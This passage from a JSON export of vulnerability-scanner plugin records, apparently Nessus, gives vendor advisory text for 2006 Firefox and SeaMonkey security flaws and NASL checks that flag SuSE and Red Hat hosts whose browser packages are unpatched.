exploited.", "edition": 24, "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : Firefox (ZYPP Patch Number 1960)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "modified": "2007-12-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_MOZILLAFIREFOX-1960.NASL", "href": "https://www.tenable.com/plugins/nessus/29354", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29354);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3804\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n\n script_name(english:\"SuSE 10 Security Update : Firefox (ZYPP Patch Number 1960)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This security update brings Mozilla Firefox to version 1.5.0.6.\n\nMore details can be found on:\nhttp://www.mozilla.org/projects/security/known-vulnerabiliti es.html\n\nIt includes fixes to the following security problems :\n\n - Code execution through deleted frame reference.\n (CVE-2006-3801 / MFSA 2006-44)\n\n Thilo Girmann discovered that in certain circumstances a\n JavaScript reference to a frame or window was not\n properly cleared when the referenced content went away,\n and he demonstrated that this pointer to a deleted\n object could be used to execute native code supplied by\n the attacker.\n\n - JavaScript navigator Object Vulnerability.\n (CVE-2006-3677 / MFSA 2006-45)\n\n An anonymous researcher for TippingPoint and the Zero\n Day Initiative showed that when used in a web page Java\n would reference properties of the window.navigator\n object as it started up. If the page replaced the\n navigator object before starting Java then the browser\n would crash in a way that could be exploited to run\n native code supplied by the attacker.\n\n - Memory corruption with simultaneous events.\n (CVE-2006-3113 / MFSA 2006-46)\n\n Secunia Research has discovered a vulnerability in\n Mozilla Firefox 1.5 branch, which can be exploited by\n malicious people to compromise a user's system.\n\n The vulnerability is caused due to an memory corruption\n error within the handling of simultaneously happening\n XPCOM events, which leads to use of a deleted timer\n object. This generally results in a crash but\n potentially could be exploited to execute arbitrary code\n on a user's system when a malicious website is visited.\n\n - Native DOM methods can be hijacked across domains.\n (CVE-2006-3802 / MFSA 2006-47)\n\n A malicious page can hijack native DOM methods on a\n document object in another domain, which will run the\n attacker's script when called by the victim page. This\n could be used to steal login cookies, password, or other\n sensitive data on the target page, or to perform actions\n on behalf of a logged-in user.\n\n Access checks on all other properties and document nodes\n are performed correctly. This cross-site scripting (XSS)\n attack is limited to pages which use standard DOM\n methods of the top-level document object, such as\n document.getElementById(). This includes many popular\n sites, especially the newer ones that offer rich\n interaction to the user.\n\n - JavaScript new Function race condition. (CVE-2006-3803 /\n MFSA 2006-48)\n\n H. D. Moore reported a testcase that was able to trigger\n a race condition where JavaScript garbage collection\n deleted a temporary variable still being used in the\n creation of a new Function object. The resulting use of\n a deleted object may be potentially exploitable to run\n native code provided by the attacker.\n\n - Heap buffer overwrite on malformed VCard. (CVE-2006-3804\n / MFSA 2006-49)\n\n A VCard attachment with a malformed base64 field (such\n as a photo) can trigger a heap buffer overwrite. These\n have proven exploitable in the past, though in this case\n the overwrite is accompanied by an integer underflow\n that would attempt to copy more data than the typical\n machine has, leading to a crash.\n\n - JavaScript engine vulnerabilities. (CVE-2006-3805 /\n CVE-2006-3806 / MFSA 2006-50)\n\n Continuing our security audit of the JavaScript engine,\n Mozilla developers found and fixed several potential\n vulnerabilities.\n\n Igor Bukanov and shutdown found additional places where\n an untimely garbage collection could delete a temporary\n object that was in active use (similar to MFSA 2006-01 /\n MFSA 2006-10). Some of these may allow an attacker to\n run arbitrary code given the right conditions.\n\n Georgi Guninski found potential integer overflow issues\n with long strings in the toSource() methods of the\n Object, Array and String objects as well as string\n function arguments.\n\n - Privilege escalation using named-functions and redefined\n 'new Object()'. (CVE-2006-3807 / MFSA 2006-51)\n\n moz_bug_r_a4 discovered that named JavaScript functions\n have a parent object created using the standard Object()\n constructor (ECMA-specified behavior) and that this\n constructor can be redefined by script (also\n ECMA-specified behavior). If the Object() constructor is\n changed to return a reference to a privileged object\n with useful properties it is possible to have\n attacker-supplied script excuted with elevated\n privileges by calling the function. This could be used\n to install malware or take other malicious actions.\n\n Our fix involves calling the internal Object constructor\n which appears to be what other ECMA-compatible\n interpreters do.\n\n - PAC privilege escalation using Function.prototype.call.\n (CVE-2006-3808 / MFSA 2006-52)\n\n moz_bug_r_a4 reports that a malicious Proxy AutoConfig\n (PAC) server could serve a PAC script that can execute\n code with elevated privileges by setting the required\n FindProxyForURL function to the eval method on a\n privileged object that leaked into the PAC sandbox. By\n redirecting the victim to a specially crafted URL --\n easily done since the PAC script controls which proxy to\n use -- the URL 'hostname' can be executed as privileged\n script.\n\n A malicious proxy server can perform spoofing attacks on\n the user so it was already important to use a\n trustworthy PAC server.\n\n - UniversalBrowserRead privilege escalation.\n (CVE-2006-3809 / MFSA 2006-53)\n\n shutdown reports that scripts granted the\n UniversalBrowserRead privilege can leverage that into\n the equivalent of the far more powerful\n UniversalXPConnect since they are allowed to 'read' into\n a privileged context. This allows the attacker the\n ability to run scripts with the full privelege of the\n user running the browser, possibly installing malware or\n snooping on private data. This has been fixed so that\n UniversalBrowserRead and UniversalBrowserWrite are\n limited to reading from and writing into only\n normally-privileged browser windows and frames.\n\n - XSS with XPCNativeWrapper(window).Function(...).\n (CVE-2006-3810 / MFSA 2006-54)\n\n shutdown reports that cross-site scripting (XSS) attacks\n could be performed using the construct\n XPCNativeWrapper(window).Function(...), which created a\n function that appeared to belong to the window in\n question even after it had been navigated to the target\n site.\n\n - Crashes with evidence of memory corruption.\n (CVE-2006-3811 / MFSA 2006-55)\n\n As part of the Firefox 1.5.0.5 stability and security\n release, developers in the Mozilla community looked for\n and fixed several crash bugs to improve the stability of\n Mozilla clients. Some of these crashes showed evidence\n of memory corruption that we presume could be exploited\n to run arbitrary code with enough effort.\n\n - chrome: scheme loading remote content. (CVE-2006-3812 /\n MFSA 2006-56)\n\n Benjamin Smedberg discovered that chrome URL's could be\n made to reference remote files, which would run scripts\n with full privilege. There is no known way for web\n content to successfully load a chrome: url, but if a\n user could be convinced to do so manually (perhaps by\n copying a link and pasting it into the location bar)\n this could be exploited.\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-01.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-01/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-10.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-10/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-44.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-44/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-45/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-46.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-46/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-47.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-47/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-48.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-48/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-49.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-49/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-50.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-50/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-51.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-51/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-52.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-52/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-53.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-53/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-54.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-54/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-55.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-55/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-56.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-56/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3113.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3677.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3801.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3802.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3803.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3804.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3805.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3806.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3807.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3808.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3809.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3810.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3811.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3812.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 1960.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox Navigator Object Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"MozillaFirefox-1.5.0.6-1.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"MozillaFirefox-translations-1.5.0.6-1.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"MozillaFirefox-1.5.0.6-1.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"MozillaFirefox-translations-1.5.0.6-1.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:05:39", "description": "Updated SeaMonkey packages that fix several security bugs are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the way SeaMonkey processed certain\nJavaScript actions. A malicious web page could execute arbitrary\nJavaScript instructions with the permissions of 'chrome', allowing the\npage to steal sensitive information or install browser malware.\n(CVE-2006-3807, CVE-2006-3809, CVE-2006-3812)\n\nSeveral denial of service flaws were found in the way SeaMonkey\nprocessed certain web content. A malicious web page could crash the\nbrowser or possibly execute arbitrary code as the user running\nSeaMonkey. (CVE-2006-3801, CVE-2006-3677, CVE-2006-3113,\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\n\nA buffer overflow flaw was found in the way SeaMonkey Messenger\ndisplayed malformed inline vcard attachments. If a victim viewed an\nemail message containing a carefully crafted vcard, it was possible to\nexecute arbitrary code as the user running SeaMonkey Messenger.\n(CVE-2006-3804)\n\nSeveral flaws were found in the way SeaMonkey processed certain\nJavaScript actions. A malicious web page could conduct a cross-site\nscripting attack or steal sensitive information (such as cookies owned\nby other domains). (CVE-2006-3802, CVE-2006-3810)\n\nA flaw was found in the way SeaMonkey processed Proxy AutoConfig\nscripts. A malicious Proxy AutoConfig server could execute arbitrary\nJavaScript instructions with the permissions of 'chrome', allowing the\npage to steal sensitive information or install browser malware.\n(CVE-2006-3808)\n\nUsers of SeaMonkey are advised to upgrade to this update, which\ncontains SeaMonkey version 1.0.3 that corrects these issues.", "edition": 28, "published": "2006-07-28T00:00:00", "title": "RHEL 3 : seamonkey (RHSA-2006:0608)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "modified": "2006-07-28T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:seamonkey", "p-cpe:/a:redhat:enterprise_linux:seamonkey-nss-devel", "p-cpe:/a:redhat:enterprise_linux:seamonkey-nspr", "p-cpe:/a:redhat:enterprise_linux:seamonkey-js-debugger", "p-cpe:/a:redhat:enterprise_linux:seamonkey-devel", "p-cpe:/a:redhat:enterprise_linux:seamonkey-nss", "p-cpe:/a:redhat:enterprise_linux:seamonkey-mail", "p-cpe:/a:redhat:enterprise_linux:seamonkey-nspr-devel", "p-cpe:/a:redhat:enterprise_linux:seamonkey-chat", "p-cpe:/a:redhat:enterprise_linux:seamonkey-dom-inspector"], "id": "REDHAT-RHSA-2006-0608.NASL", "href": "https://www.tenable.com/plugins/nessus/22114", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0608. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22114);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3804\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n script_xref(name:\"RHSA\", value:\"2006:0608\");\n\n script_name(english:\"RHEL 3 : seamonkey (RHSA-2006:0608)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated SeaMonkey packages that fix several security bugs are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the way SeaMonkey processed certain\nJavaScript actions. A malicious web page could execute arbitrary\nJavaScript instructions with the permissions of 'chrome', allowing the\npage to steal sensitive information or install browser malware.\n(CVE-2006-3807, CVE-2006-3809, CVE-2006-3812)\n\nSeveral denial of service flaws were found in the way SeaMonkey\nprocessed certain web content. A malicious web page could crash the\nbrowser or possibly execute arbitrary code as the user running\nSeaMonkey. (CVE-2006-3801, CVE-2006-3677, CVE-2006-3113,\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\n\nA buffer overflow flaw was found in the way SeaMonkey Messenger\ndisplayed malformed inline vcard attachments. If a victim viewed an\nemail message containing a carefully crafted vcard, it was possible to\nexecute arbitrary code as the user running SeaMonkey Messenger.\n(CVE-2006-3804)\n\nSeveral flaws were found in the way SeaMonkey processed certain\nJavaScript actions. A malicious web page could conduct a cross-site\nscripting attack or steal sensitive information (such as cookies owned\nby other domains). (CVE-2006-3802, CVE-2006-3810)\n\nA flaw was found in the way SeaMonkey processed Proxy AutoConfig\nscripts. A malicious Proxy AutoConfig server could execute arbitrary\nJavaScript instructions with the permissions of 'chrome', allowing the\npage to steal sensitive information or install browser malware.\n(CVE-2006-3808)\n\nUsers of SeaMonkey are advised to upgrade to this update, which\ncontains SeaMonkey version 1.0.3 that corrects these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3113\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3677\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3801\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3802\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3803\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3804\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3807\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3809\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3810\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3811\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2006:0608\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox Navigator Object Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-chat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-js-debugger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0608\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-1.0.3-0.el3.1\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-chat-1.0.3-0.el3.1\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-devel-1.0.3-0.el3.1\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-dom-inspector-1.0.3-0.el3.1\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-js-debugger-1.0.3-0.el3.1\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-mail-1.0.3-0.el3.1\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-nspr-1.0.3-0.el3.1\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-nspr-devel-1.0.3-0.el3.1\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-nss-1.0.3-0.el3.1\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-nss-devel-1.0.3-0.el3.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"seamonkey / seamonkey-chat / seamonkey-devel / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T05:31:53", "description": "The installed version of SeaMonkey contains various security issues,\nsome of which could lead to execution of arbitrary code on the affected\nhost subject to the user's privileges.", "edition": 25, "published": "2006-07-27T00:00:00", "title": "SeaMonkey < 1.0.3 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:seamonkey"], "id": "SEAMONKEY_103.NASL", "href": "https://www.tenable.com/plugins/nessus/22097", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22097);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\",\n \"CVE-2006-3803\", \"CVE-2006-3804\", \"CVE-2006-3805\", \"CVE-2006-3806\",\n \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\",\n \"CVE-2006-3811\", \"CVE-2006-3812\");\n script_bugtraq_id(19181, 19192, 19197);\n script_xref(name:\"CERT\", value:\"655892\");\n\n script_name(english:\"SeaMonkey < 1.0.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of SeaMonkey\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser on the remote host is prone to multiple flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of SeaMonkey contains various security issues,\nsome of which could lead to execution of arbitrary code on the 